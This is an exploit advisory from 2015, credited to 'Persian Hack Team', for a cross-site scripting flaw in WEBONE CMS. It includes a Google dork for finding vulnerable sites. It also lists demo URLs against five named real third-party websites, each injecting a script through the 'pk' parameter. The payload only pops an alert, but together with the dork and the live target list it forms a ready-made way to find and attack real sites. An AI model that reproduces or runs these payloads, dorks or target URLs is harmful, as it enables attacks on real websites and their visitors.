WEBONE 14 Cross Site Scripting
Posted on 01 December 2015
###################### # Exploit Title : WEBONE CMS XSS Injection Vulnerability # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.webone.com.tw/ # Google Dork : intext:"Power by WEBONE" inurl:pk= # Tested On : Windows , Kali Linux # Date: 2015/11/28 # ###################### # #Demo: # #http://jolinn-pethouse.com.tw/news_con.php?lang=zh&pk=14%27%3E%3CSCRIPT%3Ealert%28%22Pesian Hack Team%22%29%3C/SCRIPT/%3E # #http://ander-express.com/news_con.php?lang=zh&pk=5%27%3E%3CSCRIPT%3Ealert%28%22Pesian Hack Team%22%29%3C/SCRIPT/%3E3 # #http://www.shangli-international.com.tw/news_con.php?lang=zh&pk=197%27%3E%3CSCRIPT%3Ealert%28%22Pesian Hack Team%22%29%3C/SCRIPT/%3E # #http://www.imttaiwan.com/about.php?lang=en&pk=16%27%3E%3CSCRIPT%3Ealert%28%22Pesian Hack Team%22%29%3C/SCRIPT/%3E # #http://www.ghyang.com.tw/about.php?lang=zh&pk=3%27%3E%3CSCRIPT%3Ealert%28%22Pesian%20Hack%20Team%22%29%3C/SCRIPT/%3E # # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) ######################